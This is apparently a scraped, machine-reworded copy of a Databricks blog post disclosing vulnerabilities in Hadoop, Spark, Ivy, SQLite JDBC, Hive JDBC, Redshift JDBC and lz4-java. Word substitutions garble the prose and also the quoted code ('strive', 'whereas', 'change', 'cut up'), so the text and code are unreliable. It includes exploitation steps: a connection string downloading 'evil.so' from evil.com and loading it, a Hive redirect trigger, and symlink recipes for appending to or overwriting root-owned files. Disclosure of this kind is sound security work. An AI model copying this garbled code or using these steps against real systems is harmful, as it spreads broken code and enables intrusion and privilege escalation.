Open Supply Safety at Databricks

October 25, 2024

35

The Databricks Product Safety crew is deeply dedicated to making sure the safety and integrity of its merchandise, that are constructed on high of and built-in with quite a lot of open supply initiatives. Recognizing the significance of those open supply foundations, the crew actively contributes to the safety of those initiatives, thereby enhancing the general safety posture of each Databricks merchandise and the broader open supply ecosystem. This dedication is manifested by means of a number of key actions, together with figuring out and reporting vulnerabilities, contributing patches, and taking part in safety critiques and audits of open supply initiatives. By doing so, Databricks not solely safeguards its personal merchandise but in addition helps the resilience and safety of the open supply initiatives it depends on.

This weblog will present an outline of the technical particulars of a number of the vulnerabilities that the crew found.

CVE-2022-26612: Hadoop FileUtil unTarUsingTar shell command injection vulnerability

Apache Hadoop Widespread affords an API that enables customers to untar an archive utilizing the tar Unix device. To take action, it builds a command line, doubtlessly additionally utilizing gzip, and executes it. The difficulty lies in the truth that the trail to the archive, which may very well be underneath person management, will not be correctly escaped in some conditions. This might enable a malicious person to inject their very own instructions within the archive identify, by way of shell metacharacters for instance.

The weak code could be discovered right here.

untarCommand.append("cd '")
     .append(FileUtil.makeSecureShellPath(untarDir))
     .append("' && ")
     .append("tar -xf ");

if (gzipped) {
  untarCommand.append(" -)");
} else {
  untarCommand.append(FileUtil.makeSecureShellPath(inFile)); // <== not single-quoted!
}
String[] shellCmd = { "bash", "-c", untarCommand.toString() };
ShellCommandExecutor shexec = new ShellCommandExecutor(shellCmd);
shexec.execute();

Be aware that makeSecureShellPath solely escapes single quotes however doesn’t add any. There have been some debates as to the implications of the difficulty for Hadoop itself, however ultimately since it’s a publicly supplied API, it ended up warranting a repair. Databricks was invested in fixing this challenge because the Spark code for unpack was leveraging the weak code.

CVE-2022-33891: Apache Spark™ UI shell command injection vulnerability

Apache Spark™ makes use of some API to map a given person identify to a set of teams it belongs to. One of many implementations is ShellBasedGroupsMappingProvider, which leveraged the id Unix command. The username handed to the operate was appended to the command with out being correctly escaped, doubtlessly permitting for arbitrary command injection.

The weak code may very well be discovered right here.

  // shells out a "bash -c id -Gn username" to get person teams
  non-public def getUnixGroups(username: String): Set[String] = {
    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)  // <== potential command injection!
    // we'd like to get rid of the trailing "n" from the outcome of command execution
    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.cut up(" ").toSet
  }

We had to determine if this supplier may very well be reached with untrusted person enter, and located the next path:

ShellBasedGroupsMappingProvider.getGroups
Utils.getCurrentUserGroups
SecurityManager.isUserInACL
SecurityManager.checkUIViewPermissions
HttpSecurityFilter.doFilter

Satirically, the Spark UI HTTP safety filter might enable that code to reached by way of the doAs question parameter (see right here). Thankfully, some checks in isUserInACL prevented this vulnerability to be triggerable in a default configuration.

Apache Ivy helps a packaging attribute that enables artifacts to be unpacked on the fly. The operate used to carry out the Zip unpacking didn’t verify for “../” within the Zip entry names, permitting for a listing traversal kind of assault, also referred to as “zip slip”.

The weak code may very well be discovered right here.

whereas (((entry = zip.getNextEntry()) != null)) {
    File f = new File(dest, entry.getName());  // <== no verify on the identify of the entry!
    Message.verbose("ttexpanding " + entry.getName() + " to " + f);
    // create middleman directories - generally zip do not add them
    File dirF = f.getParentFile();
    if (dirF != null) {
        dirF.mkdirs();
    }
    if (entry.isDirectory()) {
        f.mkdirs();
    } else {
        writeFile(zip, f);
    }
    f.setLastModified(entry.getTime());
}

This might enable a person with the flexibility to feed Ivy a malicious module descriptor to jot down information exterior of the native obtain cache.

CVE-2023-32697: SQLite JDBC driver distant code execution

SQLite JDBC driver could be made to load a distant extension because of the predictable momentary file naming when loading a distant database file utilizing jdbc:sqlite::useful resource and enable_load_extension choices that allow extension loading.

The primary challenge is utilizing hashCode methodology to generate a brief identify with out making an allowance for that hashCode will produce the identical output for a similar string throughout JVMs, an attacker can predict the output and, subsequently, the placement of the obtain file.

The weak code could be discovered right here.

String tempFolder = new File(System.getProperty("java.io.tmpdir")).getAbsolutePath();
String dbFileName = String.format("sqlite-jdbc-tmp-%d.db", resourceAddr.hashCode()); // <== predictable momentary file
File dbFile = new File(tempFolder, dbFileName);

Whereas the difficulty could be triggered in a single step, here’s a breakdown for simplicity:

Utilizing the next connection string: “jdbc:sqlite::useful resource:http://evil.com/evil.so?enable_load_extension=true”

It will lead to downloading the .so file in a predictable location within the /tmp folder, and could be later loaded utilizing: “choose load_extension(‘/tmp/sqlite-jdbc-tmp-{NUMBER}.db’)”

CVE-2023-35701: Apache Hive JDBC driver arbitrary command execution

JDBC driver scrutiny has elevated in the previous few years, due to the work of individuals like pyn3rd, who offered their work at Safety Conferences worldwide, notably “Make JDBC Assault Good Once more.” This challenge is only a byproduct of their work, because it seems to be similar to one other challenge they reported within the Snowflake JDBC driver.

The core of the difficulty resides within the openBrowserWindow operate that may be discovered right here.

//Desktop will not be supported, lets attempt to open the browser course of
OsType os = getOperatingSystem();
change (os) {
  case WINDOWS:
    Runtime.getRuntime()
        .exec("rundll32 url.dll,FileProtocolHandler " + ssoUri.toString());
    break;
  case MAC:
    Runtime.getRuntime().exec("open " + ssoUri.toString());
    break;
  case LINUX:
    Runtime.getRuntime().exec("xdg-open " + ssoUri.toString());
    break;

This operate will execute a command based mostly on the redirect URI that would doubtlessly be supplied by an untrusted supply.

To set off the difficulty, one can specify a connection string reminiscent of: jdbc:hive2://URL/default;auth=browser;transportMode=http;httpPath=jdbc;ssl=true which makes use of the browser authentication mechanism, with an endpoint that can return a 302 and specify a Location header (in addition to X-Hive-Shopper-Identifier) to impress the defective conduct. The truth that ssoURI is a Java URI restricts the liberty that an attacker would have with their crafted command line.

CVE-2024-23945: Apache Spark™ and Hive Thrift Server cookie verification bypass

Spark’s ThriftHttpServlet could be made to just accept a cookie that can function a solution to authenticate a person. It’s managed by the hive.server2.thrift.http.cookie.auth.enabled configuration possibility (the default worth for this selection relies on the undertaking, however a few of them have it set to true). The validateCookie operate will likely be used to confirm it, which can finally name CookieSigner.verifyAndExtract. The difficulty resides in the truth that on verification failure, an exception will likely be raised that can return each the obtained signature and the anticipated legitimate one, permitting a person to ship the request once more with mentioned legitimate signature.

The weak code could be discovered right here.

if (!MessageDigest.isEqual(originalSignature.getBytes(), currentSignature.getBytes())) {
  throw new IllegalArgumentException("Invalid signal, unique = " + originalSignature +
    " present = " + currentSignature);  // <== output the precise anticipated signature!
}

Instance output returned to the consumer:

java.lang.IllegalArgumentException: Invalid signal, unique = AAAA present = OoWtbzoNldPiaNNNQ9UTpHI5Ii7PkPGZ+/3Fiv++GO8=
    at org.apache.hive.service.CookieSigner.verifyAndExtract(CookieSigner.java:84)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.getClientNameFromCookie(ThriftHttpServlet.java:226)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.validateCookie(ThriftHttpServlet.java:282)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.doPost(ThriftHttpServlet.java:127)

Each Apache Hive and Apache Spark™ have been weak to this and have been fastened with the next PRs:

The timeline for this challenge to be fastened and revealed illustrates a number of the difficulties encountered when coping with reporting vulnerabilities to Open Supply initiatives:

Could 16, 2023: reported to [email protected]
Could 17, 2023: acknowledged
Jun 9, 2023: requested replace on the case
Jun 12, 2023: reply that this can be a safety challenge
Oct 16, 2023: requested an replace on the case
Oct 17, 2023: reply {that a} patch could be utilized to Spark, however the standing on the Hive aspect is unclear
Nov 6, 2023: requested an replace on the case
Dec 4, 2023: requested an replace on the case after noticing that the difficulty is publicly fastened in Hive and Spark
Feb 7, 2024: requested an replace on the case
Feb 23, 2024: launch of Spark 3.5.1
Mar 5, 2024: requested an replace on the case
Mar 20, 2024: reply that this has been assigned CVE-2024-23945 on the Spark aspect
Mar 29, 2024: launch of Hive 4.0.0
Apr 19, 2024: saying that we are going to publish particulars of the difficulty because it’s been greater than a 12 months, with little to no updates from the related Apache PMCs

Redshift JDBC Arbitrary File Append

The Amazon JDBC Driver for Redshift is a Kind 4 JDBC driver that permits database connectivity utilizing the usual JDBC APIs supplied within the Java Platform, Enterprise Version. This driver permits any Java utility, utility server, or Java-enabled applet to entry Redshift.

If the JDBC driver is prolonged throughout a privilege boundary, an attacker can use the Redshift JDBC Driver’s logging performance to append partially managed log contents to any file on the filesystem. The contents can include newlines / arbitrary characters and can be utilized to raise privileges.

Within the connection URL, a “LogPath” variable can be utilized to provide the trail through which log information needs to be saved.

This leads to information reminiscent of “redshift_jdbc_connection_XX.log,” the place XX is a sequential quantity inside the listing, and log entries are written to the file as anticipated. When creating these information, symbolic hyperlinks are honored, and the log contents are written to the goal of the hyperlink.

Through the use of a managed listing and symlinking to vital information, a person in the environment can achieve a managed write to arbitrary root-owned information and elevate privileges on the system.

The supply code for the Redshift JDBC logfile dealing with is offered on the following repo: https://github.com/aws/amazon-redshift-jdbc-driver/blame/33e046e1ccef43517fe4deb96f38cc5ac2bc73d1/src/most important/java/com/amazon/redshift/logger/LogFileHandler.java#L225

To recreate this, you’ll be able to create a listing in tmp, reminiscent of “/tmp/logging.” Inside this listing, the person should create symbolic hyperlinks with filenames matching the sample redshift_jdbc_connection_XX.log, the place the log file increments every time the redshift JDBC connector is used.

These symbolic hyperlinks should level to the file you want to append to. The attacker can then set off the usage of the Redshift JDBC connector, following the symlink and appending it to the file.

LZ4 Java arbitrary file write privilege escalation

The lz4-java library (a java wrapper across the lz4 library) comprises a file-based race situation vulnerability that happens when a compiled library is dropped onto a disk. Giant Java purposes reminiscent of Spark and Hadoop use this library closely.

The next code demonstrates this vulnerability:

File tempLib = null;
File tempLibLock = null;
strive {
  // Create the .lck file first to keep away from a race situation
  // with different concurrently operating Java processes utilizing lz4-java.
  tempLibLock = File.createTempFile("liblz4-java-", "." + os().libExtension + ".lck");
  tempLib = new File(tempLibLock.getAbsolutePath().replaceFirst(".lck$", ""));
  // copy to tempLib
  strive (FileOutputStream out = new FileOutputStream(tempLib)) {
    byte[] buf = new byte[4096];
    whereas (true) {
    int learn = is.learn(buf);
    if (learn == -1) {
      break;
    }
    out.write(buf, 0, learn);
  }
}
System.load(tempLib.getAbsolutePath());

As you’ll be able to see, this code writes out a .so saved inside the jar file to a brief listing earlier than loading and executing it. The createTempFile operate is used to generate a novel path to keep away from collisions. Earlier than writing the file to disk, the developer creates a variant model of the file with a .lck extension for the assumed goal of stopping collisions from different processes utilizing the library. Nonetheless, this .lck file will enable an attacker watching the listing to aim to race the creation of the file after receiving the filename from the .lck creation and making a symbolic hyperlink pointing anyplace on the filesystem.

The ramifications of this are twofold: first, the attacker will be capable to overwrite any file on the system with the contents of this .so file. This will enable an unprivileged attacker to overwrite root owned information. Second, the symlink could be changed between writing and loading, permitting the attacker to load a customized shared object they supply as root. If this library is used throughout a privilege boundary, this will likely grant an attacker with code execution at an elevated privilege degree.

Conclusion

At Databricks, we acknowledge that enhancing the safety of the open supply software program we make the most of is a collective effort. We’re dedicated to proactively bettering the safety of our contributions and dependencies, fostering collaboration inside the neighborhood, and implementing finest practices to safeguard our methods. By prioritizing safety and inspiring transparency, we intention to create a extra resilient open supply surroundings for everybody. Study extra about Databricks Safety on our Safety and Belief Heart.

Open Supply Safety at Databricks

CVE-2022-26612: Hadoop FileUtil unTarUsingTar shell command injection vulnerability

CVE-2022-33891: Apache Spark™ UI shell command injection vulnerability

CVE-2023-32697: SQLite JDBC driver distant code execution

CVE-2023-35701: Apache Hive JDBC driver arbitrary command execution

CVE-2024-23945: Apache Spark™ and Hive Thrift Server cookie verification bypass

Redshift JDBC Arbitrary File Append

LZ4 Java arbitrary file write privilege escalation

Conclusion

Related Articles

AI ‘lights up’ nanoparticles, revealing hidden atomic dynamics

Atomically-precise Au22(Lys-Cys-Lys)16 nanoclusters for radiation sensitization | Journal of Nanobiotechnology

A Robotic Hand That Feels Simply Proper

LEAVE A REPLY Cancel reply

Latest Articles

AI ‘lights up’ nanoparticles, revealing hidden atomic dynamics

Atomically-precise Au22(Lys-Cys-Lys)16 nanoclusters for radiation sensitization | Journal of Nanobiotechnology

A Robotic Hand That Feels Simply Proper

Akool Avatar Overview: The Most Lifelike AI Avatar But?

Graphene manufacturing method provides inexperienced various to graphite mining